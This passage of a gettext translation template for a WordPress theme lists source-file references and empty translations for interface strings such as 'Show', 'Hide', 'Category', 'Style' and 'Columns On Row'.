framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:134 #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:144 #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:154 #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:164 #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:174 #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:184 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:8 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:215 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:225 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:226 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:236 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:237 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:247 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:257 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:267 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:277 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:287 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:297 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:307 #: framework-customizations/extensions/footers/footers/footer-01/options.php:152 #: framework-customizations/extensions/footers/footers/footer-01/options.php:285 #: framework-customizations/extensions/footers/footers/footer-01/options.php:415 #: framework-customizations/extensions/footers/footers/footer-01/options.php:434 #: framework-customizations/extensions/footers/footers/footer-01/options.php:449 #: framework-customizations/extensions/footers/footers/footer-01/options.php:474 #: framework-customizations/extensions/footers/footers/footer-01/options.php:568 #: framework-customizations/extensions/footers/footers/footer-01/options.php:588 #: framework-customizations/extensions/footers/footers/footer-01/options.php:602 #: framework-customizations/extensions/footers/footers/footer-01/options.php:627 #: framework-customizations/extensions/footers/footers/footer-01/options.php:721 #: framework-customizations/extensions/footers/footers/footer-01/options.php:741 #: framework-customizations/extensions/footers/footers/footer-01/options.php:755 #: framework-customizations/extensions/footers/footers/footer-01/options.php:780 #: framework-customizations/extensions/footers/footers/footer-02/options.php:151 #: framework-customizations/extensions/footers/footers/footer-02/options.php:278 #: framework-customizations/extensions/footers/footers/footer-02/options.php:408 #: framework-customizations/extensions/footers/footers/footer-02/options.php:427 #: framework-customizations/extensions/footers/footers/footer-02/options.php:442 #: framework-customizations/extensions/footers/footers/footer-02/options.php:467 #: framework-customizations/extensions/footers/footers/footer-02/options.php:560 #: framework-customizations/extensions/footers/footers/footer-02/options.php:580 #: framework-customizations/extensions/footers/footers/footer-02/options.php:594 #: framework-customizations/extensions/footers/footers/footer-02/options.php:619 #: framework-customizations/extensions/footers/footers/footer-02/options.php:712 #: framework-customizations/extensions/footers/footers/footer-02/options.php:732 #: framework-customizations/extensions/footers/footers/footer-02/options.php:746 #: framework-customizations/extensions/footers/footers/footer-02/options.php:771 #: framework-customizations/extensions/footers/footers/footer-03/options.php:151 #: framework-customizations/extensions/footers/footers/footer-03/options.php:266 #: framework-customizations/extensions/footers/footers/footer-03/options.php:396 #: framework-customizations/extensions/footers/footers/footer-03/options.php:415 #: framework-customizations/extensions/footers/footers/footer-03/options.php:430 #: framework-customizations/extensions/footers/footers/footer-03/options.php:455 #: framework-customizations/extensions/footers/footers/footer-03/options.php:548 #: framework-customizations/extensions/footers/footers/footer-03/options.php:568 #: framework-customizations/extensions/footers/footers/footer-03/options.php:582 #: framework-customizations/extensions/footers/footers/footer-03/options.php:607 #: framework-customizations/extensions/footers/footers/footer-03/options.php:700 #: framework-customizations/extensions/footers/footers/footer-03/options.php:720 #: framework-customizations/extensions/footers/footers/footer-03/options.php:734 #: framework-customizations/extensions/footers/footers/footer-03/options.php:759 #: framework-customizations/extensions/footers/footers/footer-04/options.php:151 #: framework-customizations/extensions/footers/footers/footer-04/options.php:270 #: framework-customizations/extensions/footers/footers/footer-04/options.php:400 #: framework-customizations/extensions/footers/footers/footer-04/options.php:419 #: framework-customizations/extensions/footers/footers/footer-04/options.php:434 #: framework-customizations/extensions/footers/footers/footer-04/options.php:459 #: framework-customizations/extensions/footers/footers/footer-04/options.php:552 #: framework-customizations/extensions/footers/footers/footer-04/options.php:572 #: framework-customizations/extensions/footers/footers/footer-04/options.php:586 #: framework-customizations/extensions/footers/footers/footer-04/options.php:611 #: framework-customizations/extensions/footers/footers/footer-04/options.php:704 #: framework-customizations/extensions/footers/footers/footer-04/options.php:724 #: framework-customizations/extensions/footers/footers/footer-04/options.php:738 #: framework-customizations/extensions/footers/footers/footer-04/options.php:763 #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:55 #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:27 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:72 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:83 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:94 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:116 #: framework-customizations/extensions/shortcodes/shortcodes/video-carousel/vc_options.php:28 #: framework-customizations/theme/options/general-settings.php:318 #: framework-customizations/theme/options/post-settings.php:181 #: framework-customizations/theme/options/post-settings.php:439 #: framework-customizations/theme/options/post-settings.php:511 msgid "Show" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/config.php:36 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:9 #: framework-customizations/extensions/footers/footers/footer-01/options.php:156 #: framework-customizations/extensions/footers/footers/footer-01/options.php:289 #: framework-customizations/extensions/footers/footers/footer-01/options.php:419 #: framework-customizations/extensions/footers/footers/footer-01/options.php:439 #: framework-customizations/extensions/footers/footers/footer-01/options.php:453 #: framework-customizations/extensions/footers/footers/footer-01/options.php:478 #: framework-customizations/extensions/footers/footers/footer-01/options.php:572 #: framework-customizations/extensions/footers/footers/footer-01/options.php:592 #: framework-customizations/extensions/footers/footers/footer-01/options.php:606 #: framework-customizations/extensions/footers/footers/footer-01/options.php:631 #: framework-customizations/extensions/footers/footers/footer-01/options.php:725 #: framework-customizations/extensions/footers/footers/footer-01/options.php:745 #: framework-customizations/extensions/footers/footers/footer-01/options.php:759 #: framework-customizations/extensions/footers/footers/footer-01/options.php:784 #: framework-customizations/extensions/footers/footers/footer-02/options.php:155 #: framework-customizations/extensions/footers/footers/footer-02/options.php:282 #: framework-customizations/extensions/footers/footers/footer-02/options.php:412 #: framework-customizations/extensions/footers/footers/footer-02/options.php:432 #: framework-customizations/extensions/footers/footers/footer-02/options.php:446 #: framework-customizations/extensions/footers/footers/footer-02/options.php:471 #: framework-customizations/extensions/footers/footers/footer-02/options.php:564 #: framework-customizations/extensions/footers/footers/footer-02/options.php:584 #: framework-customizations/extensions/footers/footers/footer-02/options.php:598 #: framework-customizations/extensions/footers/footers/footer-02/options.php:623 #: framework-customizations/extensions/footers/footers/footer-02/options.php:716 #: framework-customizations/extensions/footers/footers/footer-02/options.php:736 #: framework-customizations/extensions/footers/footers/footer-02/options.php:750 #: framework-customizations/extensions/footers/footers/footer-02/options.php:775 #: framework-customizations/extensions/footers/footers/footer-03/options.php:155 #: framework-customizations/extensions/footers/footers/footer-03/options.php:270 #: framework-customizations/extensions/footers/footers/footer-03/options.php:400 #: framework-customizations/extensions/footers/footers/footer-03/options.php:420 #: framework-customizations/extensions/footers/footers/footer-03/options.php:434 #: framework-customizations/extensions/footers/footers/footer-03/options.php:459 #: framework-customizations/extensions/footers/footers/footer-03/options.php:552 #: framework-customizations/extensions/footers/footers/footer-03/options.php:572 #: framework-customizations/extensions/footers/footers/footer-03/options.php:586 #: framework-customizations/extensions/footers/footers/footer-03/options.php:611 #: framework-customizations/extensions/footers/footers/footer-03/options.php:704 #: framework-customizations/extensions/footers/footers/footer-03/options.php:724 #: framework-customizations/extensions/footers/footers/footer-03/options.php:738 #: framework-customizations/extensions/footers/footers/footer-03/options.php:763 #: framework-customizations/extensions/footers/footers/footer-04/options.php:155 #: framework-customizations/extensions/footers/footers/footer-04/options.php:274 #: framework-customizations/extensions/footers/footers/footer-04/options.php:404 #: framework-customizations/extensions/footers/footers/footer-04/options.php:424 #: framework-customizations/extensions/footers/footers/footer-04/options.php:438 #: framework-customizations/extensions/footers/footers/footer-04/options.php:463 #: framework-customizations/extensions/footers/footers/footer-04/options.php:556 #: framework-customizations/extensions/footers/footers/footer-04/options.php:576 #: framework-customizations/extensions/footers/footers/footer-04/options.php:590 #: framework-customizations/extensions/footers/footers/footer-04/options.php:615 #: framework-customizations/extensions/footers/footers/footer-04/options.php:708 #: framework-customizations/extensions/footers/footers/footer-04/options.php:728 #: framework-customizations/extensions/footers/footers/footer-04/options.php:742 #: framework-customizations/extensions/footers/footers/footer-04/options.php:767 #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:54 #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:26 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:32 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:73 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:84 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:95 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:117 #: framework-customizations/extensions/shortcodes/shortcodes/video-carousel/vc_options.php:29 #: framework-customizations/theme/options/general-settings.php:314 #: framework-customizations/theme/options/post-settings.php:185 #: framework-customizations/theme/options/post-settings.php:392 #: framework-customizations/theme/options/post-settings.php:443 #: framework-customizations/theme/options/post-settings.php:515 #: framework-customizations/theme/options/posts/slz-faq.php:95 #: framework-customizations/theme/options/template-settings.php:565 msgid "Hide" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/config.php:40 #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:52 #: framework-customizations/extensions/events/shortcodes/event-carousel/config.php:27 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:18 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:104 #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:20 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:34 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:47 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:154 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:214 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:39 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:52 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:138 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:198 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:38 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:51 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:130 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:190 #: framework-customizations/extensions/lema/shortcodes/course-collection/vc_options.php:30 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:8 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:64 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:15 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:62 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:15 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:144 #: framework-customizations/theme/options/page-header-settings.php:222 #: framework-customizations/theme/options/post-settings.php:154 msgid "Category" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/config.php:41 #: framework-customizations/extensions/events/shortcodes/event-carousel/config.php:28 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:19 #: framework-customizations/theme/config.php:541 msgid "Event" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/config.php:45 #: framework-customizations/extensions/events/shortcodes/event-carousel/vc_options.php:14 #: framework-customizations/extensions/faq/shortcodes/faq-block/vc_options.php:8 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/options/layout-1.php:4 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/options/layout-2.php:4 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:7 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:14 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:13 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:12 #: framework-customizations/extensions/instagram/shortcodes/instagram/vc_options.php:5 #: framework-customizations/extensions/lema/shortcodes/course-collection/vc_options.php:10 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:88 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:99 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:110 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:121 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:132 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:143 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:154 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:178 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:194 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:210 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:226 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:97 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list.php:89 #: framework-customizations/extensions/new-tweet/shortcodes/new-tweet/vc_options.php:9 #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:17 #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:5 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:14 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/config.php:67 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:164 #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:12 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:5 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:13 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:6 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:11 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-1.php:7 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-2.php:13 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-4.php:8 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-5.php:7 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:6 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:11 #: framework-customizations/theme/options/advertisement-settings.php:68 #: framework-customizations/theme/options/general-settings.php:112 #: framework-customizations/theme/options/general-settings.php:126 #: framework-customizations/theme/options/post-settings.php:272 #: framework-customizations/theme/options/post-settings.php:286 #: framework-customizations/theme/options/post-settings.php:300 #: framework-customizations/theme/options/post-settings.php:314 #: framework-customizations/theme/options/post-settings.php:489 #: framework-customizations/theme/options/theme-requirements.php:24 #: framework-customizations/theme/options/theme-requirements.php:33 #: framework-customizations/theme/options/theme-requirements.php:107 #: framework-customizations/theme/options/theme-requirements.php:139 #: framework-customizations/theme/options/theme-requirements.php:247 msgid "No" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/options/layout-1.php:6 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/options/layout-1.php:7 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/config.php:17 #: framework-customizations/extensions/gallery/shortcodes/isotope/config.php:18 #: framework-customizations/extensions/headers/headers/header-09/options/button.php:23 #: framework-customizations/extensions/headers/headers/header-09/options/logo.php:23 #: framework-customizations/extensions/headers/headers/header-09/options/menu.php:25 #: framework-customizations/extensions/headers/headers/header-09/options/search_box.php:9 #: framework-customizations/extensions/lema/shortcodes/course-collection/options/layout-1.php:5 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-search-box.php:69 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-uni-search-box.php:43 #: framework-customizations/extensions/new-tweet/shortcodes/new-tweet/options/layout-1.php:6 #: framework-customizations/extensions/portfolio/shortcodes/portfolio-list/options/layout-1.php:4 #: framework-customizations/extensions/shortcodes/shortcodes/accordion/options/layout-1.php:6 #: framework-customizations/extensions/shortcodes/shortcodes/contact/options/layout-1.php:6 #: framework-customizations/extensions/shortcodes/shortcodes/count-down/vc_options.php:4 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:38 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-1.php:3 #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:7 #: framework-customizations/extensions/shortcodes/shortcodes/main-title/options/layout-1.php:3 #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/config.php:20 #: framework-customizations/extensions/shortcodes/shortcodes/partner/config.php:24 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/config.php:25 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/config.php:31 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:36 #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/options/layout-1.php:3 #: framework-customizations/extensions/shortcodes/shortcodes/progress-bar/options/layout-1.php:4 #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-1.php:10 #: framework-customizations/extensions/shortcodes/shortcodes/video-carousel/config.php:20 #: framework-customizations/extensions/teams/shortcodes/team-block/options/layout-1.php:3 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-1.php:3 #: framework-customizations/extensions/widgets/widgets/partner/config.php:13 #: framework-customizations/theme/options/page-header-settings.php:36 #: framework-customizations/theme/options/page-options.php:89 msgid "Florida" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/options/layout-1.php:7 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/options/layout-1.php:8 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/config.php:18 #: framework-customizations/extensions/gallery/shortcodes/isotope/config.php:19 #: framework-customizations/extensions/headers/headers/header-09/options/logo.php:24 #: framework-customizations/extensions/headers/headers/header-09/options/search_box.php:10 #: framework-customizations/extensions/lema/shortcodes/course-collection/options/layout-1.php:6 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-search-box.php:70 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-uni-search-box.php:44 #: framework-customizations/extensions/new-tweet/shortcodes/new-tweet/options/layout-1.php:7 #: framework-customizations/extensions/portfolio/shortcodes/portfolio-list/options/layout-1.php:5 #: framework-customizations/extensions/shortcodes/shortcodes/accordion/options/layout-1.php:7 #: framework-customizations/extensions/shortcodes/shortcodes/contact/options/layout-1.php:7 #: framework-customizations/extensions/shortcodes/shortcodes/count-down/vc_options.php:5 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:39 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-1.php:4 #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:8 #: framework-customizations/extensions/shortcodes/shortcodes/main-title/options/layout-1.php:4 #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/config.php:21 #: framework-customizations/extensions/shortcodes/shortcodes/partner/config.php:25 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/config.php:26 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/config.php:32 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:37 #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/options/layout-1.php:4 #: framework-customizations/extensions/shortcodes/shortcodes/progress-bar/options/layout-1.php:5 #: framework-customizations/extensions/shortcodes/shortcodes/timeline/options/layout-1.php:11 #: framework-customizations/extensions/shortcodes/shortcodes/video-carousel/config.php:21 #: framework-customizations/extensions/teams/shortcodes/team-block/options/layout-1.php:4 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-1.php:4 #: framework-customizations/extensions/widgets/widgets/partner/config.php:14 #: framework-customizations/theme/options/page-header-settings.php:37 #: framework-customizations/theme/options/page-options.php:90 msgid "California" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/options/layout-1.php:8 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/config.php:19 #: framework-customizations/extensions/gallery/shortcodes/isotope/config.php:20 #: framework-customizations/extensions/headers/headers/header-09/options/menu.php:26 #: framework-customizations/extensions/headers/headers/header-09/options/search_box.php:11 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-search-box.php:71 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-uni-search-box.php:45 #: framework-customizations/extensions/shortcodes/shortcodes/contact/options/layout-1.php:8 #: framework-customizations/extensions/shortcodes/shortcodes/count-down/vc_options.php:6 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-1.php:5 #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:9 #: framework-customizations/extensions/shortcodes/shortcodes/main-title/options/layout-1.php:5 #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/config.php:22 #: framework-customizations/extensions/shortcodes/shortcodes/partner/config.php:26 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/config.php:27 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/config.php:33 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:38 #: framework-customizations/extensions/shortcodes/shortcodes/progress-bar/options/layout-1.php:6 #: framework-customizations/extensions/shortcodes/shortcodes/video-carousel/config.php:22 #: framework-customizations/extensions/teams/shortcodes/team-block/options/layout-1.php:5 #: framework-customizations/extensions/widgets/widgets/partner/config.php:15 msgid "Georgia" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/options/layout-1.php:15 #: framework-customizations/extensions/events/shortcodes/event-carousel/options/layout-1.php:14 #: framework-customizations/extensions/events/shortcodes/event-carousel/options/layout-3.php:12 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/options/layout-1.php:14 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/options/layout-2.php:15 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/options/layout-6.php:10 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:63 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:66 #: framework-customizations/extensions/headers/headers/header-09/options/button.php:21 #: framework-customizations/extensions/headers/headers/header-09/options/logo.php:21 #: framework-customizations/extensions/headers/headers/header-09/options/menu.php:23 #: framework-customizations/extensions/headers/headers/header-09/options/search_box.php:6 #: framework-customizations/extensions/lema/shortcodes/course-collection/options/layout-1.php:25 #: framework-customizations/extensions/lema/shortcodes/course-collection/options/layout-2.php:13 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:64 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-search-box.php:66 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-uni-search-box.php:40 #: framework-customizations/extensions/new-tweet/shortcodes/new-tweet/options/layout-1.php:13 #: framework-customizations/extensions/portfolio/shortcodes/portfolio-list/options/layout-1.php:10 #: framework-customizations/extensions/shortcodes/shortcodes/about-me/vc_options.php:36 #: framework-customizations/extensions/shortcodes/shortcodes/accordion/options/layout-1.php:15 #: framework-customizations/extensions/shortcodes/shortcodes/contact/options/layout-1.php:15 #: framework-customizations/extensions/shortcodes/shortcodes/contact/options/layout-2.php:15 #: framework-customizations/extensions/shortcodes/shortcodes/count-down/vc_options.php:19 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-1.php:18 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-2.php:17 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-4.php:12 #: framework-customizations/extensions/shortcodes/shortcodes/main-title/options/layout-1.php:15 #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:11 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:32 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-4.php:7 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:33 #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/options/layout-1.php:9 #: framework-customizations/extensions/shortcodes/shortcodes/progress-bar/options/layout-1.php:16 #: framework-customizations/extensions/shortcodes/shortcodes/video-carousel/vc_options.php:8 #: framework-customizations/extensions/shortcodes/shortcodes/video/options/layout-2.php:14 #: framework-customizations/extensions/teams/shortcodes/team-block/options/layout-1.php:17 #: framework-customizations/extensions/teams/shortcodes/team-block/options/layout-2.php:11 #: framework-customizations/extensions/teams/shortcodes/team-block/options/layout-3.php:15 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-1.php:14 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-2.php:20 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-4.php:15 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-5.php:14 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-6.php:13 #: framework-customizations/extensions/widgets/widgets/partner/options.php:11 #: framework-customizations/theme/options/page-header-settings.php:33 #: framework-customizations/theme/options/page-options.php:86 msgid "Style" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/options/layout-1.php:18 #: framework-customizations/extensions/lema/shortcodes/course-collection/options/layout-1.php:29 #: framework-customizations/extensions/lema/shortcodes/course-collection/options/layout-2.php:17 #: framework-customizations/extensions/teams/shortcodes/team-block/options/layout-1.php:20 #: framework-customizations/extensions/teams/shortcodes/team-block/options/layout-2.php:14 #: framework-customizations/extensions/teams/shortcodes/team-block/options/layout-3.php:18 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-1.php:17 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-2.php:23 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-4.php:18 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-5.php:17 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-6.php:20 msgid "Select style for blocks" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/options/layout-1.php:23 msgid "Label Position" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/options/layout-1.php:26 msgid "Top" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/options/layout-1.php:27 msgid "Bottom" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/options/layout-1.php:29 msgid "Select positon for display label." msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/options/layout-3.php:7 #: framework-customizations/extensions/lema/shortcodes/course-collection/options/layout-1.php:12 #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:76 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:95 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:75 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list.php:68 #: framework-customizations/extensions/new-tweet/shortcodes/new-tweet/options/layout-2.php:8 #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:62 msgid "Columns On Row" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/options/layout-3.php:10 #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:10 #: framework-customizations/extensions/lema/shortcodes/course-collection/options/layout-1.php:15 #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:79 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:98 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:78 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list.php:71 #: framework-customizations/extensions/new-tweet/shortcodes/new-tweet/options/layout-2.php:11 #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:65 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:19 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:25 #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:22 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:3 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/config.php:71 #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:5 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:25 msgid "One" msgstr "" #: framework-customizations/extensions/events/shortcodes/event-block/options/layout-3.php:11 #: framework-customizations/extensions/events/shortcodes/event-block/vc_options.php:11 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:7 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:6 #: framework-customizations/extensions/lema/shortcodes/course-collection/options/layout-1.php:16 #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:80 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:99 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:79 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list.php:72 #: 